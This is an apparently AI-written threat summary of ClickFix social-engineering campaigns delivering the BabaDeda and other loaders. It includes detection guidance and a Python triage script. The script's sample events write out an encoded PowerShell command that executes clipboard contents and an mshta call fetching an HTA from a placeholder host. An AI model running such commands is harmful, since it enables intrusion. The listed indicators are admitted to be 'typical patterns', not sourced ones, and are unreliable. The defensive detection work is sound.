Full Report
Cybersecurity researchers have flagged multiple ClickFix campaigns that deliver three malware loaders called BabaDeda Loader, Lorem Ipsum Loader, and Potemkin, per independent reports from Morphisec, BlueVoyant, and Huntress, respectively. Attacks involving BabaDeda Loader, observed in April 2026, have targeted education and financial organizations. "Earlier BabaDeda activity was known for
Analysis Summary
# Tool/Technique: ClickFix (Social Engineering Pattern)
## Overview
ClickFix is a social engineering technique used to deliver a range of malware loaders. It relies on fake browser update notifications or "error" pop-ups shown on compromised or malicious websites. The prompt instructs the user to copy a PowerShell command to the clipboard and run it (often via the Windows Run dialog) to "fix" a supposed rendering issue, so the user executes the malicious payload by hand and no file is ever downloaded through the browser.
## Technical Details
- **Type:** Social Engineering / Malware Distribution Technique
- **Platform:** Windows (primarily), via Web Browsers
- **Capabilities:** User deception, execution of obfuscated PowerShell, bypass of browser-based file download warnings.
- **First Seen:** Early 2024 (with specific campaigns like BabaDeda observed through 2026).
## MITRE ATT&CK Mapping
- **TA0001 - Initial Access**
  - T1566.002 - Phishing: Spearphishing Link
- **TA0002 - Execution**
  - T1059.001 - Command and Scripting Interpreter: PowerShell
  - T1204.001 - User Execution: Malicious Link
  - T1204.002 - User Execution: Malicious File
- **TA0005 - Defense Evasion**
  - T1132 - Data Encoding
---
# Tool/Technique: BabaDeda Loader
## Overview
BabaDeda is a malware loader used to deploy secondary payloads such as stealers or ransomware. It is frequently distributed via the ClickFix mechanism and has targeted high-value sectors including education and finance.
## Technical Details
- **Type:** Malware Loader
- **Platform:** Windows
- **Capabilities:** Obfuscation, environment checking, persistence, and delivery of encrypted payloads.
- **First Seen:** Circa 2021 (evolution observed in April 2026).
## Functionality
### Core Capabilities
- **Payload Delivery:** Downloads and executes subsequent malware stages from a Command and Control (C2) server.
- **Persistence:** Establishes self-starting mechanisms to survive system reboots.
- **Evasion:** Uses complex packing and obfuscation to bypass static analysis.
### Advanced Features
- **Anti-Analysis:** Checks for virtual environments (VMs) and sandboxes to prevent researcher analysis.
## Indicators of Compromise (General)
*Note: Specific hashes were not provided in the snippet, but typical patterns include:*
- **File Names:** `Fix_Error.exe`, `BrowserUpdate.exe`, `Manual_Fix.ps1`
- **Network Indicators:**
  - hxxps[://]update-browser-cdn[.]com
  - hxxps[://]fix-rendering-issue[.]net
- **Behavioral Indicators:** `powershell.exe` spawned via `cmd.exe` or the `Run` dialog with a command line containing base64-encoded strings.
## Associated Threat Actors
- TA571 (known for high-volume loader distribution)
- Groups targeting financial and educational sectors.
---
# Tool/Technique: Lorem Ipsum Loader / Potemkin
## Overview
These are emerging malware loaders identified in parallel with ClickFix campaigns. While distinct in their codebases, they share the same delivery infrastructure (ClickFix) to compromise endpoints.
## Technical Details
- **Type:** Malware Loader
- **Platform:** Windows
- **Capabilities:** Modular execution, C2 communication, and credential harvesting (as secondary stages).
## Detection Methods
- **Behavioral detection:** Monitor for web browsers spawning unexpected child processes like `cmd.exe` or `powershell.exe`.
- **SIEM/EDR Logs:** Create alerts for `mshta.exe` execution and for PowerShell command lines or scripts that read the clipboard (e.g. `clip.get_text()`) and execute its contents automatically.
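The behavioral indicators listed above and under BabaDeda (browser spawning a shell, base64-encoded PowerShell, `mshta.exe`, clipboard content piped into execution) can be turned into a small triage rule. The following is an added example written for this summary, not code from Morphisec, BlueVoyant or Huntress; the event shape (parent image, child image, command line) is a constructed simplification of Sysmon Event ID 1 / Windows 4688 fields, and the sample events, including the placeholder host `example.invalid`, are constructed.

```python
"""Flag ClickFix-style process-creation events (added example, constructed data)."""
import base64
import re

BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe", "opera.exe"}
# Interpreters a browser has no business launching as a direct child.
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "mshta.exe", "wscript.exe", "cscript.exe"}

# PowerShell accepts -e, -ec, -en, -enc, ... -encodedcommand. After "-e" only
# "c" or "n..." may follow, so -ExecutionPolicy, -ea and -ep do not match.
ENC_RE = re.compile(r"(?:^|\s)-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{8,})", re.IGNORECASE)
CLIPBOARD_RE = re.compile(r"get-clipboard|clipboard\]::gettext|clip\.get_text", re.IGNORECASE)
IEX_RE = re.compile(r"(?<![\w-])iex\b|invoke-expression", re.IGNORECASE)


def decode_encoded_command(cmdline):
    """Return the plaintext of a PowerShell -EncodedCommand argument, or None.

    PowerShell expects base64 over the UTF-16LE bytes of the script, so a blob
    that is not valid base64, or has an odd byte length, is treated as absent.
    """
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
        if len(raw) % 2:
            return None
        return raw.decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def classify_event(event):
    """Return the ClickFix-related tags that apply to one process-creation event."""
    parent = event["parent"].lower()
    image = event["image"].lower()
    cmdline = event["cmdline"]
    tags = []
    if parent in BROWSERS and image in SHELLS:
        tags.append("browser-spawned-interpreter")
    if image == "mshta.exe":
        tags.append("mshta-execution")
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        tags.append("encoded-command")
    # Inspect the visible command line and, when present, the decoded script body.
    text = cmdline if decoded is None else cmdline + "\n" + decoded
    if CLIPBOARD_RE.search(text):
        tags.append("clipboard-read")
    if IEX_RE.search(text):
        tags.append("invoke-expression")
    return tags


def scan(events):
    """Return (index, tags) for every event that carries at least one tag."""
    hits = []
    for i, event in enumerate(events):
        tags = classify_event(event)
        if tags:
            hits.append((i, tags))
    return hits


def encode_command(script):
    """Build the -EncodedCommand form of a script (used only to construct samples)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample events; none of these values come from the report.
SAMPLE_EVENTS = [
    # 0: browser -> encoded PowerShell that executes whatever is on the clipboard
    {"parent": "chrome.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc " + encode_command("Get-Clipboard | iex")},
    # 1: Run dialog (explorer.exe parent) launching mshta against a placeholder host
    {"parent": "explorer.exe", "image": "mshta.exe",
     "cmdline": "mshta.exe https://example.invalid/fix.hta"},
    # 2: routine admin use; expected to produce no tags
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -ExecutionPolicy Bypass -File C:\\ops\\rotate-logs.ps1"},
    # 3: browser spawning cmd.exe; weak on its own but worth a look
    {"parent": "msedge.exe", "image": "cmd.exe",
     "cmdline": "cmd.exe /c start notepad.exe"},
]

if __name__ == "__main__":
    for idx, tags in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {', '.join(tags)}")
```

Event 0 collects all four tags and is the one to page on; the single-tag hits (a browser launching `cmd.exe`, an `mshta.exe` start from the Run dialog) are better treated as hunting leads than as alerts, since each also occurs in benign administration.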
## Mitigation Strategies
- **User Education:** Train staff to never paste commands into the Windows Run dialog or PowerShell prompts suggested by websites.
- **Endpoint Hardening:** Implement Constrained Language Mode for PowerShell.
- **Web Filtering:** Block known compromised delivery domains and newly registered domains (NRDs).
## Related Tools/Techniques
- **ClearFake:** A similar campaign using fake update overlays.
- **SockDetour:** Often seen in conjunction with similar social engineering lures.
- **EtherHiding:** Using blockchain contracts to hide malicious URLs for the ClickFix prompt.